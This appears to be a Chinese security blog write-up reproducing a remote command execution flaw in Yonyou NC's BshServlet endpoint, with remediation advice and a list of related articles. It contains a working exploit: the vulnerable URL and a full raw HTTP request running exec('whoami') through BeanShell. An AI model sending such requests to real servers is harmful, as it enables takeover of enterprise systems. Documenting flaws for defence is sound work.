X友 NC 远程命令执行

一、漏洞简介

用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。

用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。(用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。)

二、漏洞影响

用友NC 全版本

三、漏洞复现

主页样式

漏洞url:

/servlet/~ic/bsh.servlet.BshServlet访问执行:
exec("whoami");

详细数据包:

POST /servlet/~ic/bsh.servlet.BshServlet
host: 127.0.0.1:8080
user-agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8bsh.script=exec("whoami");

简单批量一下

四、修复建议

1、用友NC为商业软件,可直接联系用友官方获得安全升级方案。

2、在官方安全补丁发布之前,建议相关企业严格限制用友NC的访问权限,禁止外部IP请求用友NC应用。

参考:

https://blog.csdn.net/weixin_45728976/article/details/106560286

http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html?h=%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E

往期用友漏洞:

用友GRP-u8 注入-RCE漏洞复现

注意:⚠️

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

thelostworld

开发、安全 学习-工作记录

79篇原创内容

公众号

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
语雀博客主页:https://www.yuque.com/thelostworld

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

X友 NC 远程命令执行相关推荐

  1. 用友NC远程命令执行漏洞通告

    用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)

  2. X友NC远程命令执行

    一.漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用.实现建模.开发.继承.运行.管理一体化的IT解决方案信息化平台.用友 NC bsh.servlet.BshServlet目录存在远程命 ...

  3. exim远程命令执行漏洞分析(cve-2019-10149)

    0x00 前言 在对Exim邮件服务器最新改动进行代码审计过程中,我们发现4.87到4.91版本之间的Exim存在一个远程命令执行(RCE)漏洞.这里RCE指的是远程命令执行(Remote Comma ...

  4. getshell之Nexus远程命令执行(CVE-2020-10199)

    @MoCo菜弟弟 Nexus远程命令执行CVE-2020-10199 0x01漏洞描述 ​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Reposito ...

  5. GoAhead远程命令执行漏洞(CVE-2021-42342)

    GoAhead远程命令执行漏洞(CVE-2021-42342) 目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞描述 漏洞主要是由于上 ...

  6. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  7. 横向远程命令执行——DCOM

    横向远程命令执行--DCOM 1. 测试环境 2. DCOM利用 2.1 DCOM使用 2.2 MMC20.Application 2.3 CLSID(9BA05972-F6A8-11CF-A442- ...

  8. ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...

    我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...

  9. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

最新文章

  1. Oracle创建用户设置权限
  2. Elasticsearch——Templates 模板
  3. 计算机实践报告800字,计算机软件专业大学生社会实践报告800字
  4. ashx连接mysql_对C#中的web访问mysql数据库的一些知识点进行了整理归纳总结
  5. 智能家居助手后台系统原型/智慧家居后台管理系统/应用分析/页面分析/设备分析/用户管理/运营管理/权限管理/系统设置/问题反馈/商城管理/消息管理/用户画像/公告管理/账号画像/留存用户/数据埋点
  6. DRDS 柔性事务漫谈
  7. ImportError: cannot import name 'imresize'
  8. PS 如何使用钢笔工具
  9. 单片机c51语言显示help,单片机入门-C51语言LCD12864液晶显示器的基本使用介绍
  10. c 语言编写的一元二次方程的根,C#程式求一元二次方程根
  11. 内存超频时序怎么调_一个傻瓜式内存超频教程
  12. 镁光 鸡血模式 linux,所以,镁光1100到底是不是全盘slc的模式?之前就几个帖子...
  13. 软件工程--团队作业2
  14. 职业学校计算机和机电哪个好,职业学校都有什么专业10大热门专业
  15. 【2021四川省赛】E.Don‘t Really Like How The Story Ends 图论
  16. 华为IoT首席架构师王启军:全栈工程师“养成记”
  17. 消化系统疾病病人的护理
  18. C语言实现24点小游戏
  19. Elasticsearch 索引模板
  20. 【更新于12.29】深度学习论文汇总

热门文章

  1. C++ 打怪游戏 小镇5.3.0--怪物狂欢季
  2. 数据中心和纯净住宅IP有什么区别?SOCKS5代理用哪个更好?
  3. 云服务器饥荒_阿里云搭建饥荒专用服务器
  4. 如何利用OUTLOOK邮箱提醒你每天上课把课程表导入日历
  5. 面试 腾讯 阿里 百度
  6. python 二重积分 辛普森法_二重积分的数值方法.doc
  7. linux进程通信核心态时间,Linux进程管理简谈
  8. PowerPoint2007通过版式创建幻灯片
  9. centos安装IBUS并添加98五笔
  10. Linux的jupyter lab启动,无法从远程的浏览器中访问